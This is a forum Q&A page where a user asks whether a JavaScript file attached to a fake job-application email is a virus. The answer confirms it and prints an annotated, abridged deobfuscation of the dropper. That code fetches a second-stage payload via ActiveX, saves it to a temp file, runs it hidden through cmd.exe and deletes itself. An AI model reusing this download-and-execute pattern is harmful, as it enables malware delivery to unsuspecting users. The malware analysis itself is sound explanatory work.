What is a javascript virus?

473    Asked by ranjana-admin in Java , Asked on Oct 13, 2022

So I got a random email saying this. Looks very automated:

"How are things? I was visiting your website on 4/9/2016 and I'm very interested. I'm currently looking for work either full time or as an intern to get experience in the field. Please review my Resume and let me know what you think.

Then a javascript file attached. I scanned it on VirusTotal finding only 1/55. I have opened the file to look at the text and have copy pasted it into this dump file as it is quite long.

Anyone familiar with javascript can confirm that it is a virus or not?

Answered by Admin admin

It most certainly is a javascript virus. It uses JavaScript with ActiveX* and VBScript to download and execute a stage two payload that does something else. Although it is written in JavaScript, it is not executed in the browser. Instead, it is executed in the Windows Script Host when it is double-clicked. This is the deobfuscated and abridged version of the function sQl dib from the file:

// download and execute stage 2 payload
function stage1_payload() {
    // connect to server hosting stage 2 payload and download into memory
    var http_obj = new ActiveXObject("MSXML2.XMLHTTP");
    http_obj['open']("GET", "", false);
    // evaluates true only if http connection succeeded
    if (http_obj['Status'] == 200) {
        // open activex objects for filesystem and file access
        var fs_obj = new ActiveXObject("Scripting.FileSystemObject");
        var file_obj = new ActiveXObject("ADODB.Stream");
        // create and open temporary file (as binary) in system temporary folder
        var temp_file = fs_obj['GetSpecialFolder'](2) + '' + fs_obj['GetTempName']();
        file_obj['Type'] = 1;
        // save response body containing stage 2 payload to temporary file
        file_obj['Position'] = 0;
        // execute temporary file using command prompt
        var shell_obj = new ActiveXObject("WScript.Shell");
        shell_obj['run']('cmd.exe /c ' + temp_file, 0);
    // delete currently-executing script (the js file you received)
    var script_name = WScript['ScriptFullName'];

Your Answer


Parent Categories